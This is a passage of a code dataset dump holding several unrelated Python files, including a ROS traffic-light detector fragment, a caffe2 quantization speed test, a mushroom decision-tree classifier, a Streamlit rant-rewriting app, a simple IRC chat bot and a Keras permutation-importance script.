temp_wp_idx - car_wp_idx\n\n if 0 <= d < max_dist:\n max_dist = d\n light = traffic_light\n line_wp_idx = temp_wp_idx\n\n if light:\n \n # Get light status\n state = self.get_light_state(light)\n #print(\"Traffic light found:\", car_wp_idx, line_wp_idx, state)\n return line_wp_idx, state\n\n rospy.logdebug(\"No traffic light within sensor image\")\n self.waypoints = None\n return -1, TrafficLight.UNKNOWN\n\nif __name__ == '__main__':\n try:\n TLDetector()\n except rospy.ROSInterruptException:\n rospy.logerr('Could not start traffic node.')\n","repo_name":"appinho/fastnfurios","sub_path":"ros/src/tl_detector/tl_detector.py","file_name":"tl_detector.py","file_ext":"py","file_size_in_byte":7550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2544257706","text":"n = int(input())\nmatrix = [[int(x) for x in input().split()] for i in range(n)]\nwhile True:\n command = input()\n if command == \"END\":\n break\n action, row, col, value = command.split()\n row = int(row)\n col = int(col)\n value = int(value)\n if row in range(0, len(matrix)) and col in range(0, len(matrix)):\n if action == \"Add\":\n matrix[row][col] += value\n elif action == \"Subtract\":\n matrix[row][col] -= value\n else:\n print(\"Invalid coordinates\")\nfor el in matrix:\n print(' '.join(str(a) for a in 
el))\n","repo_name":"toshhPOP/SoftUniCourses","sub_path":"Python-Advanced/Multidimentional_Lists/matrix_modification.py","file_name":"matrix_modification.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14816535449","text":"\n\nimport time\n\nimport caffe2.python.hypothesis_test_util as hu\nimport hypothesis.strategies as st\nimport numpy as np\nfrom caffe2.python import core, workspace\nfrom hypothesis import given, settings\n\n\nnp.set_printoptions(precision=6)\n\n\nclass TestSpeedFloatToFusedRandRowwiseQuantized(hu.HypothesisTestCase):\n @given(\n bitwidth_=st.sampled_from([1, 2, 4, 8]),\n random_=st.sampled_from([True, False]),\n data_shape_=st.sampled_from(\n [\n np.array([32, 512]),\n np.array([1, 1024]),\n np.array([1024, 1024]),\n np.array([1024, 1224]),\n np.array([512, 969]),\n ]\n ),\n **hu.gcs\n )\n @settings(deadline=10000)\n def test_speed_of_rand_quantization(self, bitwidth_, random_, data_shape_, gc, dc):\n X1 = np.random.rand(data_shape_[0], data_shape_[1]).astype(np.float32)\n X2 = np.random.rand(data_shape_[0], data_shape_[1]).astype(np.float32)\n\n sub_scale_sum_net = core.Net(\"sub_scale_sum\")\n sub_op = core.CreateOperator(\"Sub\", [\"X1\", \"X2\"], [\"dX\"])\n scale_op = core.CreateOperator(\"Scale\", [\"dX\"], [\"dX\"], scale=0.023)\n sum_op = core.CreateOperator(\"Sum\", [\"X2\", \"dX\"], [\"X2\"])\n sub_scale_sum_net.Proto().op.extend([sub_op, scale_op, sum_op])\n\n enc_net = core.Net(\"enc\")\n enc_op = core.CreateOperator(\n \"FloatToFusedRandRowwiseQuantized\",\n [\"dX\"],\n [\"Y\"],\n bitwidth=bitwidth_,\n random=random_,\n )\n enc_net.Proto().op.extend([enc_op])\n\n dec_net = core.Net(\"dec\")\n dec_op = core.CreateOperator(\n \"FusedRandRowwiseQuantizedToFloat\", [\"Y\"], [\"decX\"]\n )\n dec_net.Proto().op.extend([dec_op])\n\n workspace.FeedBlob(\"X1\", X1)\n workspace.FeedBlob(\"X2\", X2)\n\n workspace.CreateNet(sub_scale_sum_net)\n workspace.CreateNet(enc_net)\n workspace.CreateNet(dec_net)\n workspace.RunNet(sub_scale_sum_net)\n workspace.RunNet(enc_net)\n workspace.RunNet(dec_net)\n\n sub_scale_sum_time = 0\n enc_time = 0\n dec_time = 0\n times = 10\n for _ in range(times):\n start = time.time()\n workspace.RunNet(sub_scale_sum_net)\n end = time.time()\n sub_scale_sum_time += end - start\n\n start = time.time()\n workspace.RunNet(enc_net)\n end = time.time()\n enc_time += end - start\n\n start = time.time()\n workspace.RunNet(dec_net)\n end = time.time()\n dec_time += end - start\n\n print(\"Sub+Scale+Sum time: {} ms\".format(sub_scale_sum_time / times * 1000))\n print(\n \"Quantizing time: {} ms ({}X)\".format(\n enc_time / times * 1000, enc_time / sub_scale_sum_time\n )\n )\n print(\n \"De-quantizing time: {} ms ({}X)\".format(\n dec_time / times * 1000, dec_time / sub_scale_sum_time\n )\n )\n\n\nif __name__ == \"__main__\":\n import unittest\n\n unittest.main()\n","repo_name":"pytorch/pytorch","sub_path":"caffe2/python/operator_test/rand_quantization_op_speed_test.py","file_name":"rand_quantization_op_speed_test.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"34223489250","text":"\nimport pandas as pd\nimport math\nTraining_data = pd.read_csv('mush_train.data',header = None)\nTest_data = pd.read_csv('mush_test.data',header = None)\n\n\nattrLen = len(Training_data.columns)-1\n\n#print(Training_data.loc[Training_data[0] == 'p'] )\n 
\n\ndef split(data, dupAttrList):\n rows = len(data) \n maxProb = 1\n bestAttr = -1\n for i in dupAttrList:\n prob = 0 #prob of the target given an attribute\n for j in attrValues[i]:\n temp = data.loc[data[i+1] == j, [0,i+1]]\n tempLen = len(temp)\n p = len(temp.loc[temp[0] == 'p'])\n e = len(temp.loc[temp[0] == 'e'])\n logp = 0\n loge = 0\n if(tempLen > 0):\n if p > 0:\n logp = (math.log(p/tempLen))/(math.log(2))\n if e > 0:\n loge = (math.log(e/tempLen))/(math.log(2))\n prob = prob + -1 * tempLen/rows * ((p/tempLen)*logp+(e/tempLen)*loge)\n if(prob <= maxProb):\n maxProb = prob\n bestAttr = i\n return bestAttr\n \n\n \n \n \n \n\ndef build_tree(Training_data, root):\n dupAttrList = []\n for i in range(attrLen):\n dupAttrList.append(i)\n max_height = 0;\n attr = split(Training_data, dupAttrList)\n root = attr\n dupAttrList.remove(attr)\n lst = [] \n i = len(attrValues[attr]) - 1\n while i >= 0:\n lst.append([attrValues[attr][i],attr,0])\n i = i-1\n data[attr] = Training_data;\n i = 0 \n Node_Count = 0\n while(len(lst) != 0):\n entry = lst.pop()\n Node_Count = Node_Count + 1; \n attrToSplitOn = entry[1]\n valueToSplitOn = entry[0]\n DataToSplitOn = data[attrToSplitOn]\n SplitData = DataToSplitOn.loc[DataToSplitOn[attrToSplitOn+1] == valueToSplitOn]\n p = len(SplitData.loc[SplitData[0] == 'p'])\n e = len(SplitData.loc[SplitData[0] == 'e'])\n height = entry[2]+1\n if height > max_height:\n max_height = height\n lenSplitData = len(SplitData)\n if(lenSplitData == 0):\n p = len(DataToSplitOn.loc[DataToSplitOn[0] == 'p'])\n e = len(DataToSplitOn.loc[DataToSplitOn[0] == 'e'])\n if p > e:\n tree[attrToSplitOn][valueToSplitOn] = 'p'\n else:\n tree[attrToSplitOn][valueToSplitOn] = 'e'\n else:\n if p == lenSplitData:\n tree[attrToSplitOn][valueToSplitOn] = 'p'\n elif e == lenSplitData:\n tree[attrToSplitOn][valueToSplitOn] = 'e'\n else:\n attr = split(SplitData, dupAttrList)\n dupAttrList.remove(attr)\n data[attr] = SplitData;\n tree[attrToSplitOn][valueToSplitOn] = attr\n i = len(attrValues[attr]) - 1\n while i >= 0:\n lst.append([attrValues[attr][i],attr,height])\n i = i-1\n for i in dupAttrList:\n del tree[i]\n return root, max_height+1, Node_Count;\n \n \n\nattrValues = []\n\nattrValues.append(['b', 'c', 'x', 'f', 'k', 's'])\nattrValues.append(['f', 'g', 'y', 's'])\nattrValues.append(['n','b','c','g','r','p','u','e','w','y'])\nattrValues.append(['t','f'])\nattrValues.append(['a','l','c','y','f','m','n','p','s'])#4\nattrValues.append(['a','d','f','n'])\nattrValues.append(['c','w','d'])\nattrValues.append(['b','n'])\nattrValues.append(['k','n','b','h','g','r','o','p','u','e','w','y'])\nattrValues.append(['e','t'])\nattrValues.append(['b','c','u','e','z','r','m'])\nattrValues.append(['f','y','k','s'])\nattrValues.append(['f','y','k','s'])\nattrValues.append(['n','b','c','g','o','p','e','w','y'])\nattrValues.append(['n','b','c','g','o','p','e','w','y'])\nattrValues.append(['p','u'])\nattrValues.append(['n','o','w','y'])\nattrValues.append(['n','o','t'])\nattrValues.append(['c','e','f','l','n','p','s','z'])\nattrValues.append(['k','n','b','h','r','o','u','w','y'])\nattrValues.append(['a','c','n','s','v','y'])\nattrValues.append(['g','l','m','p','u','w','d'])\n\n\n\nattrList = []\n\n\ndata = {}\n\ntarget = ['p','e']\n\ndupAttrList = attrList\n\n\ntree = {}\n\nfor i in range(attrLen):\n attrList.append(i)\n\ndef Intialize(tree):\n for i in attrList:\n tree[i] = {}\n data[i] = {}\n for j in attrValues[i]:\n tree[i][j] = -1\n \n #duplicate Attribute List for not repeating the attributes\n\n\n\nroot = 
None\nIntialize(tree)\nroot, height, Node_count = build_tree(Training_data, root) #build tree\n\n\n#deleting the entries of the attributes that are not used\n\n \nprint(tree)\n\nprint('Height of the tree is',height)\n\nprint('Number of the nodes in the tree are',Node_count)\n\nTraining_DataLength = len(Training_data)\ni = 0\n\n\ndef accuracy(tree, data, root):\n    dataLength = len(data)\n    acc = 0\n    i = 0\n    while i < dataLength:\n        result = root\n        while True:\n            result = tree[result][data.iloc[i][result+1]]\n            if result == 'e' or result == 'p':\n                break\n        if data.iloc[i][0] == result:\n            acc = acc + 1\n        i = i+1\n    return (acc/dataLength)*100;\n    \n\ntrainingAccuracy = accuracy(tree, Training_data, root)\ntestingAccuracy = accuracy(tree, Test_data, root)\nprint('Testing accuracy is', testingAccuracy)\n\nprint('Training accuracy is', trainingAccuracy)\n\n#Merging datasets for testing accuracy based on dataset split\n\nmushroom_data = pd.concat([Training_data, Test_data])\nlenMushroom = len(mushroom_data)\n#for problem 2.7\n\ni = 10  # start at a 10% training / 90% testing split and grow by 10 each pass\nwhile i < 100:\n    trainLength = math.ceil((i/100)*lenMushroom)\n    testLength = lenMushroom - trainLength\n    #print(trainLength, testLength)\n    Training_data = mushroom_data.iloc[0:trainLength]\n    Test_data = mushroom_data.iloc[trainLength+1:lenMushroom]\n    tree = {}\n    root = None\n    Intialize(tree)\n    #print(tree)\n    root, height, Node_count = build_tree(Training_data, root)\n    #print(tree)\n    trainingAccuracy = accuracy(tree, Training_data, root)\n    #print('height', height)\n    #print('Node_count',Node_count)\n    testingAccuracy = accuracy(tree, Test_data, root)\n    print(i)\n    print('with',i,'% split of training and',100-i,'% split of testing data')\n    print('Testing accuracy is', testingAccuracy)\n    print('Training accuracy is', trainingAccuracy)\n    i = i + 10\n    \n    \n","repo_name":"ravitejaCR7/Machine-Learning","sub_path":"Decision Tree/DecisionMushTree.py","file_name":"DecisionMushTree.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"4524229514","text":"# print even and odd numbers in any range\n\ndef even_odd(arr):\n    for i in arr:\n        if i % 2 == 0:\n            print(f'{i} is even')\n        else:\n            print(f'{i} is odd')\n\nl = []\nfor i in range(100):\n    l.append(i)\n\n\neven_odd(l)","repo_name":"elip55/python_challenges","sub_path":"interview_q/even_odd.py","file_name":"even_odd.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16533056547","text":"import sys\n\nsys.stdin = open('input.txt')\n\nT = int(input())\n\nfor tc in range(1, T+1):\n    word = list(input())\n    temp = word\n    ans1 = '.'+'.#..'*len(word)\n    ans2 = '.#.#'*len(word)+'.'\n    print(ans1)\n    print(ans2)\n    while temp:\n        w = temp.pop(0)\n        if len(temp) == 0:\n            print('#.'+w+'.#')\n        else:\n            print('#.'+w+'.', end='')\n        print(ans2)\n    print(ans1)","repo_name":"yuueuni/algorithm","sub_path":"swea/SWEA_D3/re/4751/4751.py","file_name":"4751.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71545217192","text":"import streamlit as st\nfrom langchain.prompts import PromptTemplate\nfrom langchain.llms import OpenAI\n\n# Template for prompt\ntemplate = \"\"\"\n    Below is an angry rant message.\n    The writer wants to send this message to the recipient.\n    The message can be very rough and messy, 
with curses and bad word choices.\n Turn it into a polite complaint message, while maintaining the overall meaning.\n It should be a message that the recipient can understand and accept.\n\n Your goal is to:\n - Properly address the person's concerns\n - Adjust the tone to the requested level of politeness (0-10)\n - Convert the input into the requested language (English, Spanish, French)\n - Maintain the overall meaning of the input\n - Make it as long as the original input\n\n Here is the request:\n Message to convert: {angry_rant}\n Level of politeness: {level}\n Language: {language}\n\n Polite complaint message:\n\"\"\"\n\nprompt = PromptTemplate(\n input_variables=[\"angry_rant\", \"level\", \"language\"],\n template=template,\n)\n\nst.set_page_config(page_title=\"Polite Rant Generator\", page_icon=\":sunglasses:\")\n\nst.markdown(\n \"\"\"\n
    Angry Rant 😡 to Polite Rant 🙏
    \n \"\"\",\n unsafe_allow_html=True,\n)\n\nco1, co2 = st.columns(2)\nwith co1:\n st.image(\n image=\"./images/angry-1294679.svg\",\n width=200,\n )\nwith co2:\n st.write(\"### Let's fix this!\")\n st.markdown(\n \"Turn your Angry Rant 😡 into a Polite Rant 🙏 with just a few clicks. Express your frustrations, select the level of politeness, and let the app craft a more civilized version of your complaints. It's the perfect tool to maintain a positive tone while complaining 😊✨\"\n )\n\nst.write(\n \"### This app uses OpenAI API key. You can get one [here](https://beta.openai.com/).\"\n)\n\n\ndef get_api_key():\n return st.text_input(label=\"Enter your OpenAI API key here\")\n\n\nopenai_api_key = get_api_key()\n\n\ndef get_llm(openai_api_key):\n try :\n return OpenAI(\n temperature=0.5,\n openai_api_key=openai_api_key,\n )\n except Exception as e:\n st.error(f\"An error occurred while getting LLM: {e}\")\n\n\ndef validate_input(openai_api_key, angry_rant):\n if not openai_api_key:\n st.warning(\"Please enter your OpenAI API key\", icon=\"🙏\")\n return False\n if not angry_rant.strip():\n st.warning(\"Please enter a rant before generating\", icon=\"🙏\")\n return False\n if len(angry_rant.split()) > 400:\n st.warning(\"Please enter a rant of less than 400 words\", icon=\"🙏\")\n return False\n return True\n\n\n# Setting columns to divide the page\ncol1, col2 = st.columns(2)\nwith col1:\n st.write(\"## Vent your anger\")\n angry_rant = st.text_area(label=\"Enter your angry rant here\", height=300)\n\nwith col2:\n st.write(\"## Settings\")\n st.write(\"Select the level of politeness:\")\n level = st.slider(\n label=\"Level of politeness\", min_value=0, max_value=10, value=5, step=1\n )\n st.write(\"Select the language:\")\n language = st.selectbox(label=\"Language\", options=[\"English\", \"Spanish\", \"French\", \"Korean\"])\n\nif st.button(label=\"Generate!\"):\n if validate_input(openai_api_key, angry_rant):\n llm = get_llm(openai_api_key)\n st.write(\"## Result\")\n st.write(\"This is the civilized version of your rant:\")\n try:\n prompt_polite_rant = prompt.format(\n angry_rant=angry_rant, level=level, language=language\n )\n except Exception as e:\n st.error(f\"An error occurred while formating the prompt: {e}\")\n try:\n polite_rant = llm(prompt_polite_rant)\n st.write(polite_rant)\n except Exception as e:\n if e.code == 'invalid_api_key':\n st.warning(\"API key is invalid. 
Please check your OpenAI API key\")\n else:\n st.error(f\"An error occurred while generating the polite rant: {e}\")\n","repo_name":"Sigurrosist/AngryRant2PoliteRant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16786225989","text":"# -*- coding: utf-8 -*-\nimport requests\nimport sys\nimport socket\nimport thread\n\nclass Str :\n def _init_(self):\n self.str = \"\"\n\ndef webCrawler(query) :\n r = query\n s = 'https://www.youtube.com/results?search_query='\n s = s + r\n s = bytes(s.encode('utf8'))\n r = requests.get(s)\n s = r.text.encode('utf8', 'ignore')\n s = str(s)\n delim = 'href=\"/watch?v='\n index = s.find(delim)\n index2 = s.find('\"', index+len(delim))\n temp = 'https://www.youtube.com'\n output = temp + s[index+6:index2]\n return output\n\ndef signUpIRC(channelName, clientSocket) :\n message = \"NICK bot\\r\\nUSER b03204032\\r\\n\"\n clientSocket.send(bytes(message.decode('utf8').encode('utf8')))\n message = \"JOIN #\" + channelName + \"\\r\\nPRIVMSG #\" + channelName + \" :I'm b03204032\\r\\n\"\n clientSocket.send(bytes(message.decode('utf8').encode('utf8')))\n\ndef sendThread(clientSocket, nameToSend) :\n isExit = False\n buff = \"\"\n while True:\n strToInput = raw_input()\n if strToInput == \"!e\" :\n isExit = True\n if isExit == True :\n break\n # strToInput = \"PRIVMSG \" + nameToSend.str + \" :\" + strToInput.str + \"\\r\\n\"\n clientSocket.send(\"PRIVMSG \")\n clientSocket.send(bytes(nameToSend.str.decode('utf8').encode('utf8')))\n clientSocket.send(\" :\")\n clientSocket.send(bytes(strToInput.decode('utf8').encode('utf8')))\n clientSocket.send(\"\\r\\n\")\n print(\"你離開了聊天室\")\n return\n\ndef recvMsgParsing(msg) :\n orgMessage = msg.str\n delim = \"PRIVMSG bot :\"\n index = msg.str.find(delim)\n if index == -1 :\n return 0\n index += len(delim)\n msg.str = orgMessage[index:len(orgMessage)]\n while msg.str[len(msg.str)-1] == '\\n' or msg.str[len(msg.str)-1] == '\\r':\n msg.str = msg.str[0:len(msg.str)-1]\n\ndef recvNumParsing(msg) :\n orgMessage = msg.str\n isDigit = True\n delim = \"PRIVMSG bot :\"\n index = msg.str.find(delim)\n if index == -1 :\n return 0\n index += len(delim)\n msg.str = orgMessage[index:len(orgMessage)]\n while msg.str[len(msg.str)-1] == '\\n' or msg.str[len(msg.str)-1] == '\\r':\n msg.str = msg.str[0:len(msg.str)-1]\n if msg.str.isdigit() == False :\n return 0\n else :\n return int(msg.str)\n\ndef messageQuery(message, response, clientSocket, nameToSend) :\n if message.str == \"Capricorn\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Aquarius\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Pisces\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Aries\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Taurus\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Gemini\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Cancer\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Leo\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Virgo\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Libra\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Scorpio\" :\n response.str = \"nice day!\"\n return True;\n elif message.str == \"Sagittarius\" :\n response.str = \"nice day!\"\n 
return True;\n\n if message.str == \"!chat\" :\n while nameToSend.str[len(nameToSend.str)-1] == '\\n' or nameToSend.str[len(nameToSend.str)-1] == '\\r':\n nameToSend.str = nameToSend.str[0:len(nameToSend.str)-1]\n print(nameToSend.str)\n print(\"加入了聊天室!\")\n garbNum = -1\n thread.start_new_thread(sendThread, (clientSocket, nameToSend, ))\n while True:\n msg = Str()\n msg.str = clientSocket.recv(4096).decode('utf8')\n garbNum = recvMsgParsing(msg)\n if garbNum == 0 :\n continue\n if msg.str == \"!bye\" :\n print(nameToSend.str)\n print(\"離開了聊天室\\n\")\n break\n print(msg.str)\n\n if message.str == \"!guess\" :\n down = 1\n bingo = 5\n up = 10\n isLose = True\n response = \"PRIVMSG \" + nameToSend.str + \" :\" + \"guess a number between 1 and 10!(not include 1 and 10)\\r\\n\"\n clientSocket.send(bytes(response.decode('utf8').encode('utf8')))\n while isLose == True :\n msg = Str()\n msg.str = clientSocket.recv(4096).decode('utf8')\n staus = recvNumParsing(msg)\n if staus == 0 :\n continue\n if staus == bingo :\n response = \"PRIVMSG \" + nameToSend.str + \" :bingo!\\r\\n\"\n clientSocket.send(bytes(response.decode('utf8').encode('utf8')))\n isLose = False\n break;\n if staus > bingo and staus < up :\n up = staus\n response = \"PRIVMSG \" + nameToSend.str + \" :between \" + str(down) + \" and \" + str(up) + \"!\\r\\n\"\n clientSocket.send(bytes(response.decode('utf8').encode('utf8')))\n elif staus < bingo and staus > down :\n down = staus\n response = \"PRIVMSG \" + nameToSend.str + \" :between \" + str(down) + \" and \" + str(up) + \"!\\r\\n\"\n clientSocket.send(bytes(response.decode('utf8').encode('utf8')))\n\n\n\n if message.str[0:5] == \"!song\" :\n response.str = webCrawler(message.str[6:len(message.str)])\n return True;\n # response.str = webCrawler()\n return False;\n\ndef messageParsing(message, nameToSend) :\n orgMessage = message.str\n delim = \"PRIVMSG bot :\"\n index = message.str.find(delim)\n if index == -1 :\n return 0\n index += len(delim)\n message.str = orgMessage[index:len(orgMessage)]\n while message.str[len(message.str)-1] == '\\n' or message.str[len(message.str)-1] == '\\r':\n message.str = message.str[0:len(message.str)-1]\n delim = \"!\"\n index = orgMessage.find(delim)\n nameToSend.str = orgMessage[1:index]\n return 1\ndef sendString(clientSocket, message) :\n nameToSend = Str()\n response = Str()\n statusNum = messageParsing(message, nameToSend)\n if statusNum == 0 :\n return\n isSendMessage = True;\n isSendMessage = messageQuery(message, response, clientSocket, nameToSend)\n if isSendMessage == False :\n return\n stringToSend = \"PRIVMSG \" + nameToSend.str + \" :\" + response.str + \"\\r\\n\"\n clientSocket.send(bytes(stringToSend.decode('utf8').encode('utf8')))\ndef main() :\n #lack gethostname\n clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n hostIp = \"127.0.0.1\"\n portNumber = 6667\n channelName = \"demo\"\n clientSocket.connect((hostIp, portNumber))\n signUpIRC(channelName, clientSocket)\n while True :\n msg = clientSocket.recv(4096).decode('utf8')\n message = Str()\n message.str = msg\n sendString(clientSocket, message)\n return\n\nmain()\n","repo_name":"aabb15768/2018_Computer_Network_HW01","sub_path":"irc.py","file_name":"irc.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21428316036","text":"import sys\nimport argparse\n\nif __name__ == \"__main__\":\n\n print(sys.argv)\n parser = argparse.ArgumentParser()\n\n 
parser.add_argument('items', metavar='N', type=str, nargs='+', help='items to show')\n parser.add_argument('-c', '--client_id', type=str, default='', help='input client_id if it has')\n\n args = vars(parser.parse_args())\n print(args['client_id'])\n print(args)\n\n #print(\"Hi there {}, it's nice to meet you!\".format(args[\"name\"]))\n","repo_name":"ErickRyu/PythonPlayground","sub_path":"start/simple_argument.py","file_name":"simple_argument.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73070028072","text":"import numpy as np\r\nimport pandas as pd\r\nimport tensorflow as tf\r\nimport os\r\nimport datetime\r\nimport random\r\nimport tensorflow_addons as tfa\r\nimport keras\r\nimport copy\r\n\r\n#set wd\r\nos.chdir('C:/Users/Jackson DeBord/Documents/Spring_23/Learning/Project1')\r\n\r\n#load in model\r\n\r\n#respecify architecture\r\nmodel = keras.Sequential()\r\nmodel.add(keras.layers.Dense(units=36, name='input'))\r\nmodel.add(keras.layers.Dense(units=22, activation=\"sigmoid\", name = 'hidden1')) #reduce hidden layer by 40%\r\nmodel.add(keras.layers.Dense(units=14, activation=\"sigmoid\", name= 'hidden2')) #reduce hidden layer by 40%\r\nmodel.add(keras.layers.Dense(units=9, activation=\"sigmoid\", name= 'hidden3')) #reduce hidden layer by 40%\r\nmodel.add(keras.layers.Dense(units=1, activation=\"linear\", name= 'output')) #outputs 1 result\r\n\r\n\r\n#load in model\r\n#opt = keras.optimizers.Adam(learning_rate=0.01)\r\n#model.compile(loss='mean_squared_error', optimizer=opt, metrics=['mean_squared_error'])\r\n\r\nmodel.built = True\r\nmodel.load_weights('trained_weights_0.h5')\r\n\r\n\r\n#need to get dummies and divide by range\r\n\r\n#read in pricing\r\npricing = pd.read_csv('pricing.csv')\r\n\r\n#get ranges/min\r\n\r\nranges = pd.DataFrame({'range_quantity': [np.max(pricing['quantity']) - np.min(pricing['quantity'])],\r\n 'range_duration': [np.max(pricing['duration']) - np.min(pricing['duration'])],\r\n 'range_order': [np.max(pricing['order']) - np.min(pricing['order'])],\r\n 'range_price': [np.max(pricing['price']) - np.min(pricing['price'])],\r\n 'min_quantity': [np.min(pricing['quantity'])],\r\n 'min_duration': [np.min(pricing['duration'])],\r\n 'min_order': [np.min(pricing['order'])],\r\n 'min_price': [np.min(pricing['price'])]})\r\n\r\n\r\ndf_category = pd.read_csv('category_levels.csv').sort_values(by=[\"category_levels\"])\r\n\r\n#sets categories as 1 dimensional series\r\nsorted_columns = df_category[\"category_levels\"].values.tolist()\r\n\r\n#start with order\r\n\r\n#read in test pricing data\r\npricing = pd.read_csv('pricing_test.csv', names = ['sku','price','quantity',\r\n 'order', 'duration', 'category'])\r\n\r\n\r\n#drop sku\r\npricing = pricing.drop(['sku'], axis = 1)\r\n\r\n#scaling\r\npricing['quantity'] = (pricing['quantity'] - ranges['min_quantity'][0]) / ranges['range_quantity'][0]\r\npricing['duration'] = (pricing['duration'] - ranges['min_duration'][0]) / ranges['range_duration'][0]\r\npricing['order'] = (pricing['order'] - ranges['min_order'][0]) / ranges['range_order'][0]\r\npricing['price'] = (pricing['price'] - ranges['min_price'][0]) / ranges['range_price'][0]\r\n\r\n#saving actual y-values\r\ny_true = pricing['quantity'].to_numpy()\r\n\r\n#dropping quantity\r\npricing = pricing.drop(['quantity'],axis = 1)\r\n\r\n\r\n\r\n#changing to categorical data types\r\ncategory_types = pd.CategoricalDtype(categories = sorted(df_category['category_levels'][:]), 
ordered = True)\r\n#create dummies\r\npricing['category'] = pricing['category'].astype(category_types)\r\n\r\n\r\npricing = pd.get_dummies(pricing, ['category'])\r\n\r\n\r\n#save unaltered data to numpy array\r\nX_normal = pricing.to_numpy()\r\n\r\n#permute variable of interest\r\npricing['order'] = np.random.permutation(pricing['order'])\r\n\r\n#save as numpy array\r\nX_permute = pricing.to_numpy()\r\n\r\n\r\n#predict for reg data\r\ny_hat_normal = model.predict(X_normal)\r\n\r\n#predict for permuted data\r\ny_hat_permute = model.predict(X_permute)\r\n\r\n#calculate correlation for each\r\nr_normal = np.corrcoef(y_true, y_hat_normal.flatten())\r\nr_permute = np.corrcoef(y_true, y_hat_permute.flatten())\r\n\r\n#find difference (vi)\r\nvi_order = r_normal[0,1] - r_permute[0,1]\r\nvi_order\r\n\r\n\r\n#duration\r\npricing = pd.read_csv('pricing_test.csv', names = ['sku','price','quantity',\r\n 'order', 'duration', 'category'])\r\n\r\n\r\n#drop sku\r\npricing = pricing.drop(['sku'], axis = 1)\r\n\r\n#scale\r\npricing['quantity'] = (pricing['quantity'] - ranges['min_quantity'][0]) / ranges['range_quantity'][0]\r\npricing['duration'] = (pricing['duration'] - ranges['min_duration'][0]) / ranges['range_duration'][0]\r\npricing['order'] = (pricing['order'] - ranges['min_order'][0]) / ranges['range_order'][0]\r\npricing['price'] = (pricing['price'] - ranges['min_price'][0]) / ranges['range_price'][0]\r\n\r\n#save y values and drop from df\r\ny_true = pricing['quantity'].to_numpy()\r\n\r\npricing = pricing.drop(['quantity'],axis = 1)\r\n\r\n\r\n\r\n#create dummies\r\ncategory_types = pd.CategoricalDtype(categories = sorted(df_category['category_levels'][:]), ordered = True)\r\npricing['category'] = pricing['category'].astype(category_types)\r\n\r\n\r\npricing = pd.get_dummies(pricing, ['category'])\r\n\r\n#save unaltered data\r\nX_normal = pricing.to_numpy()\r\n\r\n#permute duration\r\npricing['duration'] = np.random.permutation(pricing['duration'])\r\n\r\nX_permute = pricing.to_numpy()\r\n\r\n#predict from permuted data\r\n\r\ny_hat_normal = model.predict(X_normal)\r\n\r\ny_hat_permute = model.predict(X_permute)\r\n\r\nr_normal = np.corrcoef(y_true, y_hat_normal.flatten())\r\nr_permute = np.corrcoef(y_true, y_hat_permute.flatten())\r\n\r\n#calculate vi\r\nvi_duration = r_normal[0,1] - r_permute[0,1]\r\nvi_duration\r\n\r\n\r\n\r\n#price\r\npricing = pd.read_csv('pricing_test.csv', names = ['sku','price','quantity',\r\n 'order', 'duration', 'category'])\r\n\r\n\r\n\r\npricing = pricing.drop(['sku'], axis = 1)\r\n\r\n#scale\r\npricing['quantity'] = (pricing['quantity'] - ranges['min_quantity'][0]) / ranges['range_quantity'][0]\r\npricing['duration'] = (pricing['duration'] - ranges['min_duration'][0]) / ranges['range_duration'][0]\r\npricing['order'] = (pricing['order'] - ranges['min_order'][0]) / ranges['range_order'][0]\r\npricing['price'] = (pricing['price'] - ranges['min_price'][0]) / ranges['range_price'][0]\r\n\r\n\r\ny_true = pricing['quantity'].to_numpy()\r\n\r\npricing = pricing.drop(['quantity'],axis = 1)\r\n\r\n\r\n\r\n\r\ncategory_types = pd.CategoricalDtype(categories = sorted(df_category['category_levels'][:]), ordered = True)\r\npricing['category'] = pricing['category'].astype(category_types)\r\n\r\n\r\npricing = pd.get_dummies(pricing, ['category'])\r\n\r\nX_normal = pricing.to_numpy()\r\n\r\n\r\npricing['price'] = np.random.permutation(pricing['price'])\r\n\r\nX_permute = pricing.to_numpy()\r\n\r\n\r\n#fit predictions\r\ny_hat_normal = model.predict(X_normal)\r\n\r\ny_hat_permute = 
